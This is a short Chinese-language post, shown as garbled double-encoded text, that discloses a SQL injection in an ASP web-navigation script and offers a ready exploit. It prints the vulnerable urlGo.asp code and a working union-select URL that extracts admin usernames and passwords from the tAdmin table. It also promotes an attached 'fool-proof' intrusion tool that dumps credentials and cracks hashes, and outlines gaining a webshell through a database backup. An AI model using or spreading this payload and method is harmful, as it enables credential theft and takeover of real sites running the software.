深度學(xué)習(xí)(asp)網(wǎng)址導(dǎo)航v3.0.4 0day
發(fā)表時(shí)間:2023-04-20 來(lái)源:明輝站整理相關(guān)軟件相關(guān)文章人氣:
[摘要]んㄗ葑訫鎖愛'S Blog http://www.virusest.com/ 深度學(xué)習(xí)(asp)網(wǎng)址導(dǎo)航 v3.0.4 存在Sql注入漏洞 問(wèn)題代碼urlGo.asp: <!...
んㄗ葑訫鎖愛'S Blog http://www.virusest.com/
深度學(xué)習(xí)(asp)網(wǎng)址導(dǎo)航 v3.0.4 存在Sql注入漏洞
問(wèn)題代碼urlGo.asp:
<!--#include file="connDB.asp"-->
<!--#include file="include/Function.Common.asp"-->
<%
id=request.QueryString("id")
if id="" then
response.Redirect("/")
end if
'-----網(wǎng)址--------------
Set rsWebUrl=Server.CreateObject("Adodb.Recordset")
sqlC="select * from tWebUrl where fpassed=1 and fid=" & id
rsWebUrl.open sQLC,conn,0,1
if rsWebUrl.Eof and rsWebUrl.Bof then
response.Redirect("/")
else
%>
很明顯,可以注入,而且頭文件由于程序員疏忽,很配合的沒(méi)調(diào)用防注入系統(tǒng).其他文件均調(diào)用防注入.
利用:注意注入點(diǎn)用明小子或者啊D檢測(cè)不出來(lái),簡(jiǎn)單寫下注入語(yǔ)句:
http://localhost/urlGo.asp?id=4233%20and%201=2%20union%20select%201,2,fusername,4,5,6,7,8,9,10%20from%20tAdmin
查密碼只需把fusername改成fpassword,但是在測(cè)試的時(shí)候,發(fā)現(xiàn)因版本不同,可能表段長(zhǎng)度不同,如果提示列數(shù)不匹配,則換成9個(gè)即可.
這里我寫了利用工具,傻瓜式入侵,其中,ID值為在搜索引擎中看到的ID,如圖:
工具集成了暴密碼賬號(hào),后臺(tái)訪問(wèn),數(shù)據(jù)庫(kù)下載MD5破解等功能,工具和源碼見附件.
未加殼,歡迎篡改版權(quán)!好久沒(méi)寫程序了,就當(dāng)練手吧!
Ps:后臺(tái)拿Shell比較費(fèi)勁,提示空殼數(shù)據(jù)庫(kù),先恢復(fù)在備份,再一句話!
上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。